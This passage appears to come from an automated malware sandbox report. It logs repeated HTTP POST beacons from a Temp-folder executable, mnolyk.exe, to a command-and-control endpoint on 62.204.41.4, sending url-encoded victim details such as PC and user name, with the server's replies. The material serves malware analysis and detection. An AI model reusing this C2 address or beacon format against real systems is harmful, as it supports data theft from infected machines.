                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:56.443176031 CET450INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        25192.168.2.54971562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:35.302871943 CET225OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:35.368762016 CET226INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        250192.168.2.54994062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:56.613135099 CET451OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:56.676527023 CET451INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        251192.168.2.54994162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:56.852297068 CET452OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:56.916233063 CET452INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        252192.168.2.54994262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:57.083817959 CET453OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:57.152782917 CET453INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        253192.168.2.54994362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:57.392401934 CET454OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:57.457815886 CET454INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        254192.168.2.54994462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:57.633328915 CET455OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:57.696747065 CET455INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        255192.168.2.54994562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:57.866705894 CET456OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:57.932298899 CET456INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        256192.168.2.54994662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:58.119194984 CET457OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:58.185362101 CET457INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        257192.168.2.54994762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:58.363275051 CET458OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:58.427375078 CET458INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        258192.168.2.54994862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:58.606494904 CET459OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:58.671230078 CET459INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        259192.168.2.54994962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:58.849591017 CET460OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:58.914136887 CET460INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        26192.168.2.54971662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:36.096630096 CET226OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:36.170519114 CET227INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        260192.168.2.54995062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:59.104526997 CET461OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:59.169317961 CET461INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        261192.168.2.54995162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:59.351610899 CET462OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:59.418251038 CET462INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        262192.168.2.54995262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:59.609623909 CET463OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:59.671968937 CET463INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        263192.168.2.54995362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:59.850997925 CET464OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:59.914640903 CET464INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        264192.168.2.54995462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:00.082619905 CET465OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:00.146924019 CET465INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        265192.168.2.54995562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:00.317508936 CET466OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:00.382448912 CET466INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        266192.168.2.54995662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:00.553096056 CET467OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:00.618180990 CET467INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        267192.168.2.54995762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:00.788641930 CET468OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
